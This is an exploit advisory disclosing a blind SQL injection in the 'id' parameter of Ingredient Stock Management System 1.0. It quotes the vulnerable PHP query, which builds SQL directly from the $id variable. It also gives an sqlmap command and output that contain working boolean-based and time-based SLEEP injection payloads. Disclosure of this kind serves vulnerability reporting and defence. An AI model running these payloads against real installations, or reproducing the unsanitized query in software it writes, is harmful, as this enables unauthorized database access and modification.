Ingredient Stock Management System 1.0 SQL Injection

Ingredient Stock Management System version 1.0 suffers from a remote blind SQL injection vulnerability.

SHA-256 | 812877405ea0e76d72d7e4772f6c9f533edc2df0d65201ce055c9b60f7795d4d

# Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection
# Date: 28/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Linux

Description :

Ingredient Stock Management System 1.0 allows SQL Injection via parameter 'id' in
/isms/admin/stocks/view_stock.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database

# Vulnerable Code :

line 74 in file "/isms/admin/stocks/view_stock.php"

$stockins = $conn->query("SELECT * FROM `stockin_list` where item_id = '{$id}' order by date(`date`) asc");

# Sqlmap command:

sqlmap -u 'http://localhost/isms/admin/?page=stocks/view_stock&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=stocks/view_stock&id=1' AND 1902=1902 AND 'yluX'='yluX

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=stocks/view_stock&id=1' AND (SELECT 6709 FROM (SELECT(SLEEP(5)))gZCj) AND 'vMqP'='vMqP

Related Posts